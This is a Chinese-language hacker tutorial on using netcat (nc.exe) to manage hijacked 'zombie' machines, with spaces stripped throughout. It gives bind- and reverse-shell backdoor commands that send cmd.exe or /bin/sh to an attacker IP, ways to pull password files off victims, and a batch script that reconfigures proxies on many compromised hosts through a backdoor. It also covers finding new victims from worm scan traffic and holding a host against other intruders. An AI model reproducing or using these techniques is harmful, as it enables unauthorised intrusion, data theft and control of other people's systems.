nc.exe高级技巧应用汇总
文章作者:zhoutree
0.写在前面的话
1.Netcat1.10forNT-nc11nt.zip,原始英文信息
2.Netcat1.10forNT帮助信息
3.Netcat1.10常用的命令格式
4.管理肉鸡,更改肉鸡设置
5.下载连接
6.后记
######################################################################
0.写在前面的话
######################################################################
最近工作比较空闲,老是想着怎么自动telnet肉鸡,自动执行命令。来管理自己的肉鸡。
自己写一个程序。功底是不够的,所以只有看了看nc的帮助信息,虽然只看了个半懂,
但是借助于金山词霸2002版本,还是明白了一点东西.
我觉的有必要再总结一下.反正主要是满足我自己的需要.
######################################################################
1.Netcat1.10forNT-nc11nt.zip
######################################################################
BasicFeatures
*Outboundorinboundconnections,TCPorUDP,toorfromanyports
*FullDNSforward/reversechecking,withappropriatewarnings
*Abilitytouseanylocalsourceport
*Abilitytouseanylocally-configurednetworksourceaddress
*Built-inport-scanningcapabilities,withrandomizer
*Canreadcommandlineargumentsfromstandardinputb
*Slow-sendmode,onelineeveryNseconds
*Hexdumpoftransmittedandreceiveddata
*Abilitytoletanotherprogramserviceestablished
connections
*Telnet-optionsresponder
NewforNT
*Abilitytoruninthebackgroundwithoutaconsolewindow
*Abilitytorestartasasingle-threadedservertohandleanew
connection
________________________________________________________________________
Someofthefeaturesofnetcatare:
Outboundorinboundconnections,TCPorUDP,toorfromanyports
FullDNSforward/reversechecking,withappropriatewarnings
Abilitytouseanylocalsourceport
Abilitytouseanylocally-configurednetworksourceaddress
Built-inport-scanningcapabilities,withrandomizer
Built-inloosesource-routingcapability
Canreadcommandlineargumentsfromstandardinput
Slow-sendmode,onelineeveryNseconds
Optionalabilitytoletanotherprogramserviceinboundconnections
Someofthepotentialusesofnetcat:
Scriptbackends
Scanningportsandinventoryingservices
Backuphandlers
Filetransfers
Servertestingandsimulation
Firewalltesting
Proxygatewaying
Networkperformancetesting
Addressspoofingtests
ProtectingXservers
1001otherusesyou`lllikelycomeupwith
Netcat+Encryption=Cryptcat
对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1.1NC.EXE是一个非标准的telnet客户端程序,
1.2还有一个putty.exe客户端程序,提供四种连接模式
-raw-telnet-rlogin-ssh.
######################################################################
2.Netcat1.10forNT帮助信息
######################################################################
C:WINDOWSDesktop>nc-h
[v1.10NT]
connecttosomewhere:nc[-options]hostnameport[s][ports]...
listenforinbound:nc-l-pport[options][hostname][port]
options:
-ddetachfromconsole,backgroundmode(后台模式)
-eproginboundprogramtoexec[dangerous!!]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:4,8,12,...
-hthiscruft(本帮助信息)
-isecsdelayintervalforlinessent,portsscanned(延迟时间)
-llistenmode,forinboundconnects(监听模式,等待连接)
-Llistenharder,re-listenonsocketclose(连接关闭后,仍然继续监听)
-nnumeric-onlyIPaddresses,noDNS(ip数字模式,非dns解析)
-ofilehexdumpoftraffic(十六进制模式输出文件,三段)
-pportlocalportnumber(本地端口)
-rrandomizelocalandremoteports(随机本地远程端口)
-saddrlocalsourceaddress(本地源地址)
-tanswerTELNETnegotiation
-uUDPmode
-vverbose[usetwicetobemoreverbose](-vv更多信息)
-wsecstimeoutforconnectsandfinalnetreads
-zzero-I/Omode[usedforscanning](扫描模式,-vv)
portnumberscanbeindividualorranges:m-n[inclusive]
######################################################################
3.Netcat1.10常用的命令格式
######################################################################
下面引用《沉睡不醒10月15日凌晨》的文章的部分。
3.1.端口的刺探:
nc-vvipport
RIVER[192.168.0.198]19190(?)open//显示是否开放open
3.2.扫描器
nc-vv-w5ipport-portport
nc-vv-zipport-portport
这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3.后门
victimmachine://受害者的机器
nc-l-pport-ecmd.exe//win2000
nc-l-pport-e/bin/sh//unix,linux
attackermachine://攻击者的机器.
ncip-pport//连接victim_IP,然后得到一个shell。
3.4.反向连接
attackermachine://一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc-vv-l-pport
victimmachine:
nc-ecmd.exeattackerip-pport
nc-e/bin/shattackerip-pport
或者:
attackermachine:
nc-vv-l-pport1/*用于输入*/
nc-vv-l-pprot2/*用于显示*/
victimmachine:
ncattacker_ipport1|cmd.exe|ncattacker_ipport2
ncattacker_ipport1|/bin/sh|ncattacker_ipport2
139要加参数-s(nc.exe-L-p139-d-ecmd.exe-s对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。
3.5.传送文件:
3.5.1attackermachine<--victimmachine//从肉鸡拖密码文件回来.
nc-d-l-pport<pathfiledest/*attackermachine*/可以shell执行
nc-vvattacker_ipport>pathfile.txt/*victimmachine*/需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
3.5.2attackermachine-->victimmachine//上传命令文件到肉鸡
nc-vv-l-pport>pathfile.txt/*victimmachine*/需要Ctrl+C退出
nc-dvictim_ipport<pathfiledest/*attackermachine*/可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
结论:可以传输ascii,bin文件.可以传输程序文件.
问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe.
或者只有再次连接使用pskill.exe杀掉进程.但是是否释放传输文件打开的句柄了?
3.6端口数据抓包.
nc-vv-w2-otest.txtwww.xfocus.net8021-15
<000000583530302053796e746178206572726f72#500Syntaxerror
<000000682c20636f6d6d616e6420222220756e72#,command""unr
<0000007865636f676e697a65642e0d0a#ecognized...
<00000084830000018f#.....
3.7telnet,自动批处理。★★★★★我要重点推荐的东西就是这个.
ncvictim_ipport<pathfile.cmd/*victimmachine*/显示执行过程.
nc-vvvictim_ipport<pathfile.cmd/*victimmachine*/显示执行过程.
nc-dvictim_ipport<pathfile.cmd安静模式.
_______________file.cmd________________________
password
cd%windir%
echo[]=[%windir%]
c:
cd
mdtest
cd/d%windir%system32
netstopsksockserver
snake.exe-configport11111
netstartsksockserver
exit
_______________file.cmd__END___________________
######################################################################
4.管理肉鸡,更改肉鸡设置
######################################################################
4.1比如要统一更改肉鸡上面的代理端口.snake.exe修改为11111服务名称"sksockserver"
使用winshell后门.端口1234密码password
命令格式就是
modi.batyouip.txt
___________modi.bat____________________________
@if"%1"==""echoError:noip.txt&&gotoEND
:start
@echopassword>a.cmd
@echos>>a.cmd
@echocd/d%%windir%%system32>>a.cmd
@netstop"sksockserver">>a.cmd
@snake.exe-configport11111>>a.cmd
@netstart"sksockserver">>a.cmd
@exit>>a.cmd
:auto
@for/f"eol=;tokens=1,2"%%iin(%1)do@(nc.exe-vv-w3%%i1234<a.cmd)
:END
___________modi.bat__END_______________________
4.2
@echooff
colorf0
:start
cls
C:nc-vv-w3-l-p80>>80.txt
gotostart
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.
但是也是一种便宜的办法.
肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞
自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器
######################################################################
5.下载连接
######################################################################
5.1http://www.atstake.com/research/tools/network_utilities/
Tool:Netcat1.10forUnix
Version:03.20.96
Platforms:*nix
Tool:Netcat1.1forWin95/98/NT/2000
Version:02.08.98
Platforms:RunsonWin95/98/NT/2000
5.2http://www.xfocus.net/download.php?id=320
名称:cryptcat_nt.zip更新时间:2002-04-05
类别:网络工具平台:Win9x/NT/2000大小:115.8K提交:maxilaw
简介:加密传输的nc。
5.3http://content.443.ch/pub/security/blackhat/Networking/nc/国外的网站
10.03.0215:481305cryptcat.txt
10.03.0215:48245760cryptcat_linux2.tar
10.03.0215:48118533cryptcat_nt.zip
【nc.exe高级技巧应用汇总】相关文章:
★ ART OF WEB-SQL-INJECTION第2卷 ORACLE篇